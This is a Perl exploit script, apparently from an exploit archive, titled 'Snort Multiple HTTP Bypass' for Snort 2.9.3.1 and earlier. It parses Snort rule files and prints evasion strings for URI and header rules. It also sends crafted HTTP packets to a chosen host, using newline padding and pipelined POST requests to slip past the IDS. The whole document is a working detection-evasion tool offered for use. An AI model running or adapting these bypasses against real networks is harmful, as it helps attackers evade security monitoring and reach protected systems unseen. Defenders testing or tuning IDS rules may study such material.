Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

#!/usr/bin/perl
use IO::Socket;

# By Xianur0
# [email protected]
# http://loscaballeros.mx/
# Snort Multiple HTTP Bypass

my $bypasscount=0;
die("Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n") unless($ARGV[0]);
if(-f $ARGV[0] || -d $ARGV[0]){
	print "[-] Analyzing Rules...\n\n";
	checkrules($ARGV[0]);
} else {
	tests();
}

sub hdump {
    my $offset = 0;
    my(@array,$format);
    foreach my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
        my($len)=length($data);
        if ($len == 16) {
            @array = unpack('N4', $data);
            $format="0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
        } else {
            @array = unpack('C*', $data);
            $_ = sprintf "%2.2x", $_ for @array;
            push(@array, '  ') while $len++ < 16;
            $format="0x%08x (%05d)" .
               "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";
        } 
        $data =~ tr/\0-\37\177-\377/./;
        printf $format,$offset,$offset,@array,$data;
        $offset += 16;
    }
}

sub snorthexdecode{
	my $encoded=$_[0];
	while($encoded =~ /\|((\s*([\d\w]{2})\s*)+)\|/) {
		$cadena="\\|".$1."\\|";
		$remplazo="";
		my @caracteres=($cadena =~ /([\d\w]{2})/g);
		foreach $caracter (@caracteres) {
			$remplazo.=chr(hex($caracter));
		}
		$encoded=~s/$cadena/$remplazo/g;
	}
	return $encoded;
}
sub analizerules {
	my $pathrules=$_[0];
	if(-f $pathrules){
		open RULE,$pathrules;
		while(<RULE>) {
			my $rule=$_;
			$rule=~s/[\r\n]+$//g;
			if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){
				if(snorthexdecode($1)=~/([^"]*\.\w{1,4})(\|3F\||\?)([^"]+)/){
					my $bypass=$1."?junk&".$3;
					print "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] URI Bypass: ".$bypass."\n\n";
					$bypasscount++;
				}
			} elsif($rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){
				if(snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){
					my $bypass=$1."\t".$2;
					print "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
					$bypasscount++;
				}
			}
		}
	} elsif(-d $pathrules) {
		opendir (DIR, $pathrules);
		while(readdir DIR) {
			analizerules($pathrules."/".$_) if($_ !~/^\.+$/);
		}
	}
}
sub checkrules {
	my $checkpath=$_[0];
	analizerules($checkpath);
	print "[-] Bypassed rules: ".$bypasscount."\n";
}
sub tests {
	my $host="";
	my $port=80;
	my $path="";
	if($ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){
		$host=$1;
		$path=$2;
		if($host=~/^([^\:]+)\:(\d+)$/){
			$host=$1;
			$port=$2;
		}
	}
	if($host!~/^[^\:]+$/){
		die('Invalid URL!');
	}
	print "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
	if($path !~ "/(.+)"){
		die('I need a path...');
		$path=$1;
	}
	$encodedpath=$path;
	$encodedpath=~s/([^\/])/"%" . uc(sprintf("%2.2x",ord($1)))/eg;
	print "[-] Encoded path: ".$encodedpath."\n";
	@orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
	my $payload="POST / HTTP/1.1\r\n".
	"Content-Type: application/x-www-form-urlencoded\r\n".
	"Content-Length: 0\r\n".
	"Connection: Keep-Alive\r\n".
	"Host: ".$host.("\r\n"x12).
	"POST / HTTP/1.1\r\n".
	"Host: ".$host."\r\n".
	"Connection: Keep-Alive\r\n".
	"Content-Type: application/x-www-form-urlencoded\r\n".
	"Content-Length: 30".("\r\n"x12).
	"1234567890";

	@packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
	$packets[1]=$payload.$packets[0];

	$i=0;
	foreach $packet (@packets){
		my $sock = new IO::Socket::INET (
		PeerAddr => $host,
		PeerPort => $port,
		Proto => 'tcp',
		Reuse => 1,
		);
		die "Could not create socket: $!\n" unless $sock;
		print "[-] Seding ".$orders[$i]." test...\n";
		hdump($packet);
		print $sock $packet;
		print "\n[+] Headers:\n";
		my $todo="";
		while(<$sock>){
			$todo.=$_;
		}
		close($sock);
		hdump($todo);
		$i++;
	}
}

#  0day.today [2018-03-28]  #